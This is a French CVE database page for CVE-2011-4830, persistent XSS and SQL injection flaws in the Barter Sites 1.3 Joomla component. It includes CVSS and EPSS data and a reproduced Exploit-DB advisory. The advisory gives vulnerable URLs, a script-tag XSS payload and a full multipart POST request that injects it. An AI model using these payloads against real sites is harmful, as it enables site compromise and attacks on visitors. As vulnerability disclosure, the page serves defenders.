CVE-2011-4830 : Détail

CVE-2011-4830

Cross-site Scripting
A03-Injection
0.23%V4
Network
2011-12-15
02h00 +00:00
2024-09-16
20h41 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple cross-site scripting (XSS) vulnerabilities in the com_listing component in Barter Sites component 1.3 for Joomla! allow remote authenticated users to inject arbitrary web script or HTML via the (1) listing_title, (2) description, (3) homeurl (aka Website Address), (4) paystring (aka Payment types accepted), (5) sell_price, (6) shipping_cost, and (7) quantity parameters to index.php.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 18046

Date de publication : 2011-10-28 22h00 +00:00
Auteur : Chris Russell
EDB Vérifié : Yes

#################################################################################### Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities #################################################################################### Release Date Bug. 28-Oct-2011 Date Added. 01-Oct-2011 Vendor Notification Date. Never Product. Barter Sites Platform. Joomla Affected versions. 1.3 Type. Commercial Price. $99 Attack Vector. Sql Injection & Persistent XSS Solution Status. unpublished CVE reference. Not yet assigned Download. www.barter-sites.com/content/getStarted I. BACKGROUND The Barter Sites extension is for operating a trade group. Members post listings in the barter directory on your site, send each other offers and messages, negotiate, and 'pay' with either direct trade or with your own private digital currency called trade credits. You can even issue lines of credit. Admin has the option to earn commissions on trade credit transfers and can run transactions for the members, serving as a barter broker. Features Include: * HTML Listings * Barter Wish-list * Direct Trade Offers * Virtual Private Currency * Trade Credit Transfers * Admin Broker/Transfer * Generate Invoices * Paypal Commissions * Member Reputations * Private Messaging * and more! II. DESCRIPTION Two vulnerabilities discovered - Category_id Parameter SQL injection - XSS in several places III. EXPLOITATION *INJECTION SQL parameter [category_id]: /index.php?option=com_listing&task=browse&category_id=1[SQL] [SQL]=Injection Sql *Persistent XSS main Register->> Login ---> barter>Post: or /index.php?option=com_listing&task=post&Itemid=2 Listing Title: <IMG """><SCRIPT>alert("XSS")</SCRIPT> selection category. XSS look at: barter>selection category ---->To view the xss is not necessary to be registered *Persistent XSS side In the form of the Post, you can insert xss in all settings: -Website Address -Payment types accepted -Sell Price -Shipping Cost -Quantity all can be inserted into the header, but for Facilides directly on the form all: <IMG """><SCRIPT>alert("XSS")</SCRIPT> *Persistent XSS in pictures If you prefer pictures to insert in the xss edit header values as follows: Get:/index.php?option=com_listing&task=listingsave Post: -----------------------------106542362324353\r\n Content-Disposition: form-data; name="listing_title"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="description"\r\n \r\n <p><IMG """><SCRIPT>alert("XSS")</SCRIPT></p>\r\n <-----------------------------------click here -----------------------------106542362324353\r\n Content-Disposition: form-data; name="homeurl"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="category_id"\r\n \r\n 34\r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="paystring"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="sell_price"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="shipping_cost"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="quantity"\r\n \r\n \r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="submit"\r\n \r\n Submit\r\n -----------------------------106542362324353\r\n Content-Disposition: form-data; name="listing_id"\r\n \r\n \r\n -----------------------------106542362324353--\r\n Discovered by. Chris Russell

Products Mentioned

Configuraton 0

Barter-sites>>Com_listing >> Version 1.3

    Joomla>>Joomla\! >> Version *

    Références

    http://www.exploit-db.com/exploits/18046
    Tags : exploit, x_refsource_EXPLOIT-DB
    Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.